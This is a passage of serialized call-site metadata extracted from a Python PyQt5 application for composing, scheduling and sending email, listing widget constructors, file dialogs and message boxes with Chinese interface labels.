QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((147, 30, 147, 51), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(147, 42, 147, 50): '"""瀏覽"""'}, {}), "('瀏覽')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((149, 34, 149, 45), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((150, 34, 150, 45), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((151, 36, 151, 57), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(151, 48, 151, 56): '"""瀏覽"""'}, {}), "('瀏覽')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((153, 29, 153, 40), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((154, 30, 154, 51), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(154, 42, 154, 50): '"""瀏覽"""'}, {}), "('瀏覽')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((159, 28, 159, 47), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ({(159, 38, 159, 46): '"""使用"""'}, {}), "('使用')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, 
QHeaderView\n'), ((160, 34, 160, 55), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(160, 46, 160, 54): '"""執行"""'}, {}), "('執行')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((164, 28, 164, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((165, 28, 165, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((166, 28, 166, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((167, 32, 167, 43), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((168, 27, 168, 46), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ({(168, 37, 168, 45): '"""使用"""'}, {}), "('使用')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((169, 28, 169, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((170, 29, 170, 50), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(170, 41, 170, 49): '"""儲存"""'}, {}), "('儲存')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((172, 29, 172, 50), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(172, 41, 172, 49): '"""測試"""'}, {}), "('測試')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((176, 26, 176, 37), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((177, 26, 177, 37), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', 
False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((178, 26, 178, 37), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((179, 30, 179, 41), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((180, 30, 180, 41), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((181, 28, 181, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((183, 27, 183, 48), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(183, 39, 183, 47): '"""儲存"""'}, {}), "('儲存')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((187, 30, 187, 41), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((188, 35, 188, 46), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((189, 29, 189, 45), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ({(189, 39, 189, 44): '"""是"""'}, {}), "('是')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((190, 29, 190, 40), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((191, 30, 191, 51), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(191, 42, 191, 50): '"""瀏覽"""'}, {}), "('瀏覽')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, 
QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((193, 31, 193, 42), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((195, 24, 195, 36), 'PyQt5.QtWidgets.QTabWidget', 'QTabWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((198, 26, 198, 35), 'PyQt5.QtWidgets.QWidget', 'QWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((199, 26, 199, 35), 'PyQt5.QtWidgets.QWidget', 'QWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((203, 21, 203, 34), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((204, 21, 204, 34), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((209, 28, 209, 39), 'PyQt5.QtWidgets.QTextEdit', 'QTextEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((210, 27, 210, 43), 'PyQt5.QtWebEngineWidgets.QWebEngineView', 'QWebEngineView', ({}, {}), '()', False, 'from PyQt5.QtWebEngineWidgets import QWebEngineView\n'), ((214, 34, 214, 55), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(214, 46, 214, 54): '"""清除"""'}, {}), "('清除')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((216, 33, 216, 54), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(216, 45, 216, 53): '"""讀取"""'}, {}), "('讀取')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((218, 33, 218, 54), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(218, 45, 218, 53): '"""儲存"""'}, {}), "('儲存')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, 
QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((222, 24, 222, 38), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((224, 31, 224, 42), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((225, 28, 225, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((227, 31, 227, 52), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(227, 43, 227, 51): '"""執行"""'}, {}), "('執行')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((366, 23, 366, 99), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(366, 51, 366, 55): 'self', (366, 57, 366, 71): '"""選取檔案"""', (366, 73, 366, 77): '"""./"""', (366, 79, 366, 98): '"""Eml Files (*.eml)"""'}, {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((370, 23, 370, 102), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(370, 51, 370, 55): 'self', (370, 57, 370, 71): '"""選取檔案"""', (370, 73, 370, 77): '"""./"""', (370, 79, 370, 101): '"""Excel Files (*.xlsx)"""'}, {}), "(self, '選取檔案', './', 'Excel Files (*.xlsx)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((374, 23, 374, 107), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(374, 51, 374, 55): 'self', (374, 57, 374, 71): '"""選取檔案"""', (374, 73, 374, 77): '"""./"""', (374, 79, 374, 106): '"""Word Files (*.doc *.docx)"""'}, {}), "(self, '選取檔案', './', 'Word Files (*.doc *.docx)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((378, 23, 378, 113), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(378, 51, 378, 55): 'self', (378, 57, 378, 71): '"""選取檔案"""', (378, 73, 378, 77): '"""./"""', (378, 79, 378, 112): '"""Annex Files (*.jpg *.png *.zip)"""'}, {}), "(self, '選取檔案', './',\n 'Annex Files (*.jpg *.png *.zip)')", False, 'from PyQt5.QtWidgets 
import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((441, 23, 441, 99), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(441, 51, 441, 55): 'self', (441, 57, 441, 71): '"""選取檔案"""', (441, 73, 441, 77): '"""./"""', (441, 79, 441, 98): '"""Eml Files (*.eml)"""'}, {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((445, 23, 445, 44), 'mylibrary.genmail.get_msg', 'gm.get_msg', ({(445, 34, 445, 43): 'file_name'}, {}), '(file_name)', True, 'import mylibrary.genmail as gm\n'), ((538, 15, 538, 38), 'PyQt5.QtWidgets.QApplication.instance', 'QApplication.instance', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((32, 27, 32, 61), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ({}, {}), '()', False, 'import qdarkstyle, sys\n'), ((34, 35, 34, 54), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(34, 42, 34, 53): '"""收件人"""'}, {}), "('收件人')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((66, 27, 66, 61), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ({}, {}), '()', False, 'import qdarkstyle, sys\n'), ((156, 42, 156, 69), 'PyQt5.QtCore.QDateTime.currentDateTime', 'QDateTime.currentDateTime', ({}, {}), '()', False, 'from PyQt5.QtCore import Qt, QDateTime\n'), ((288, 25, 288, 38), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(288, 32, 288, 37): 'label'}, {}), '(label)', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((307, 36, 307, 54), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(307, 43, 307, 53): '"""查詢 :"""'}, {}), "('查詢 :')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((315, 35, 315, 59), 'copy.deepcopy', 'deepcopy', ({(315, 44, 315, 58): 'self.data_logs'}, {}), '(self.data_logs)', False, 'from copy import deepcopy\n'), ((355, 12, 355, 88), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(355, 36, 355, 40): 'self', (355, 42, 355, 52): '"""Success!"""', (355, 54, 355, 71): '"""儲存成功!"""', (355, 73, 355, 87): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((422, 12, 422, 96), 
'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(422, 32, 422, 36): 'self', (422, 38, 422, 47): '"""Failed!"""', (422, 49, 422, 79): '"""請確認有無 SMTP 資料!"""', (422, 81, 422, 95): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((466, 27, 466, 105), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', ({(466, 55, 466, 59): 'self', (466, 61, 466, 75): '"""另存為..."""', (466, 77, 466, 81): '"""./"""', (466, 83, 466, 104): '"""Excel Files (*.eml)"""'}, {}), "(self, '另存為...', './', 'Excel Files (*.eml)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((471, 12, 471, 88), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(471, 36, 471, 40): 'self', (471, 42, 471, 52): '"""Success!"""', (471, 54, 471, 71): '"""儲存成功!"""', (471, 73, 471, 87): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((532, 12, 532, 109), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(532, 32, 532, 36): 'self', (532, 38, 532, 52): '"""缺少資料"""', (532, 54, 532, 92): '"""請確認是否有資料可以下載"""', (532, 94, 532, 108): 'QMessageBox.Ok'}, {}), "(self, '缺少資料', '請確認是否有資料可以下載', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((236, 40, 236, 53), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(236, 47, 236, 52): 'label'}, {}), '(label)', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((256, 40, 256, 53), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(256, 47, 256, 52): 'label'}, {}), '(label)', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((273, 40, 273, 53), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(273, 47, 273, 52): 'label'}, {}), '(label)', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((313, 141, 313, 151), 'server.database.Database', 'Database', ({}, {}), '()', False, 'from server.database import Database\n'), ((337, 12, 337, 92), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(337, 32, 337, 36): 'self', (337, 38, 337, 47): '"""Failed!"""', (337, 49, 337, 75): '"""資料庫連結失敗!"""', (337, 77, 
337, 91): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((357, 12, 357, 83), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(357, 32, 357, 36): 'self', (357, 38, 357, 47): '"""Failed!"""', (357, 49, 357, 66): '"""儲存失敗!"""', (357, 68, 357, 82): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((399, 25, 399, 33), 'server.client.Client', 'Client', ({}, {}), '()', False, 'from server.client import Client\n'), ((402, 16, 402, 96), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(402, 40, 402, 44): 'self', (402, 46, 402, 56): '"""Success!"""', (402, 58, 402, 79): '"""排程設定成功!"""', (402, 81, 402, 95): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '排程設定成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((407, 16, 407, 111), 'GenAndSendMail.insert_send_mail', 'insert_send_mail', (), '', False, 'from GenAndSendMail import insert_send_mail\n'), ((412, 16, 412, 96), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(412, 40, 412, 44): 'self', (412, 46, 412, 56): '"""Success!"""', (412, 58, 412, 79): '"""信件寄出成功!"""', (412, 81, 412, 95): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import 